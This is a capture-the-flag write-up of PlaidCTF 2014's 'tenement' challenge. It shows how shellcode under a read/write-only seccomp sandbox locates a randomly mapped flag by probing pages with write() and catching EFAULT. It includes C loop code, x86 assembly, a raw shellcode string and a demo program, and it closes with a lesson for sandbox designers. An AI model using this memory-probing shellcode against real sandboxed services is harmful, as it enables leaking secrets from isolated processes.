
PlaidCTF 2014 tenement

Task : tenement (Pwnable 100pt)

Time Spent : 5~6H


This task opens the flag file and reads the key into a randomly mmap()ed memory location.


After that, the server lets us run arbitrary x86 shellcode. However, before our shellcode executes, the server sandboxes all system calls with SECCOMP (prctl), so only the read/write system calls are available to our shellcode.

So if we knew the memory location of the flag, we could simply execute shellcode that reads that location. The problem is that we do not know this address. At first I inspected the whole register context, the known memory regions and the stack for any information leak that would reveal the location of the flag. Unfortunately there was none.

After struggling for a while, I found that write([descriptor], [invalid address], [length]) does not raise a segmentation fault; it just returns -1. We also know that the flag resides at a page-aligned address, since it was allocated by mmap(). Therefore I realized that I could simply try this in my shellcode:


for (uintptr_t i = 0x1000; i < 0xFFFF0000; i += 0x1000) {
    /* unmapped page: write() fails with -1 (EFAULT); mapped page: its first 30 bytes are printed */
    write(1, (const void *)i, 30);
}
return;
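The probe the loop above relies on is worth seeing in isolation: the kernel answers a write() from an unmapped page with -1/EFAULT rather than delivering SIGSEGV, so a sandbox that leaves only read and write available still lets code learn which pages are mapped. The following C program is an added example written for this post, not code from the challenge or from the original writeup; it generalises the loop to an arbitrary address window and checks its own result against a constructed marker string in a page it maps itself. The pipe as a write sink, the helper names and the marker value are all assumptions of the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define PAGE 0x1000u

/* Probe one address by asking the kernel to copy `len` bytes from it into a
 * pipe. On a mapped, readable page the bytes come back through the pipe's
 * read end; on an unmapped page the kernel refuses with EFAULT instead of
 * killing the process with SIGSEGV, which is what makes the probe usable
 * under a read/write-only seccomp filter.
 * Returns bytes recovered (>0), 0 on EFAULT, -1 on any other error.
 * The sink must be a pipe or a regular file: /dev/null never touches the
 * source buffer, so writing there would report success for any address. */
ssize_t probe_page(const int pipefd[2], uintptr_t addr, char *out, size_t len)
{
    ssize_t n = write(pipefd[1], (const void *)addr, len);
    if (n < 0)
        return errno == EFAULT ? 0 : -1;
    ssize_t got = 0;
    while (got < n) {
        ssize_t r = read(pipefd[0], out + got, (size_t)(n - got));
        if (r <= 0)
            return -1;
        got += r;
    }
    return got;
}

/* Walk [lo, hi) one page at a time (the writeup's loop, generalised to an
 * arbitrary window) and return the first page whose contents start with
 * `marker`, or 0 if no page does. */
uintptr_t scan_for_marker(const int pipefd[2], uintptr_t lo, uintptr_t hi,
                          const char *marker)
{
    size_t mlen = strlen(marker);
    char buf[PAGE];
    for (uintptr_t a = lo & ~(uintptr_t)(PAGE - 1); a < hi; a += PAGE) {
        if (probe_page(pipefd, a, buf, mlen) == (ssize_t)mlen &&
            memcmp(buf, marker, mlen) == 0)
            return a;
    }
    return 0;
}

/* Self-check: map a page holding a constructed marker, show that a mapped
 * probe returns the page's data, that scanning a window finds the page, and
 * that the same address probes as unmapped after munmap.
 * Returns 0 on success, otherwise the number of the step that failed. */
int run_demo(void)
{
    int pipefd[2];
    if (pipe(pipefd) != 0)
        return 1;
    char *page = mmap(NULL, PAGE, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return 2;
    /* constructed marker, standing in for the flag the challenge kept in its page */
    const char *marker = "PCTF{constructed_marker_not_the_real_flag}";
    strcpy(page, marker);
    uintptr_t target = (uintptr_t)page;

    char out[64];
    if (probe_page(pipefd, target, out, 0x30) != 0x30)   /* 0x30: the size the shellcode used */
        return 3;
    if (memcmp(out, marker, strlen(marker)) != 0)
        return 4;
    /* search a window of 32 pages on either side of the real page */
    if (scan_for_marker(pipefd, target - 32 * PAGE, target + 32 * PAGE, marker) != target)
        return 5;
    munmap(page, PAGE);
    if (probe_page(pipefd, target, out, 0x30) != 0)       /* EFAULT, not SIGSEGV */
        return 6;
    close(pipefd[0]);
    close(pipefd[1]);
    return 0;
}

int main(void)
{
    int rc = run_demo();
    if (rc == 0)
        puts("probe/scan demo passed");
    else
        printf("demo failed at step %d\n", rc);
    return rc;
}
```

The design point for anyone building a sandbox like this one: restricting the syscall set does not hide the address-space layout, because every copy_from_user path doubles as a mapped/unmapped oracle. A secret that untrusted code must not read has to live outside that code's address space (a separate process, or handed over only through a file descriptor), not merely at a randomised address inside it.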


So I wrote a simple x86 shellcode that performs this page-by-page scan.


push %ebx
movl $0x804a3fc, %ebx      # writable word used as the loop counter
movl $0x1000, %eax         # start at the first page
movl %eax, 0x0(%ebx)
pop %ebx
L1:
push $0x30                 # size
push %eax                  # addr (current page)
push $0x1                  # fd = stdout
push $0x8048860            # write
pop %eax
call *%eax
# addl $0x0c, %esp
push %ebx
movl $0x804a3fc, %ebx
movl 0x0(%ebx), %eax       # reload the counter
addl $0x1000, %eax         # advance to the next page
movl %eax, 0x0(%ebx)
pop %ebx
cmp $0xfffff000, %eax      # whole address space scanned?
je EXIT
jmp L1
EXIT:
ret


First, I ran this shellcode in my local environment. It was a success! I could read the flag even though its location is random. However, when I ran the exact same shellcode against the server environment, there was no response... I got stuck here for a while. It turned out that the calling convention of the library function was different: my libc's write function used __cdecl, whereas the server-side libc's write used __stdcall. After I realized this and changed my shellcode, I got the flag :)


Flag : Wub-a-lubba-dub-dub


Final exploit (shellcode):

'\x6a\x20\x68\x10\x88\x04\x08\x58\xff\xd0\x68\x00\x10\x00\x00\x2d\x00\x01\x00\x00\x50\x6a\x01\x68\x60\x88\x04\x08\x58\xff\xd0\xc9\xc3'

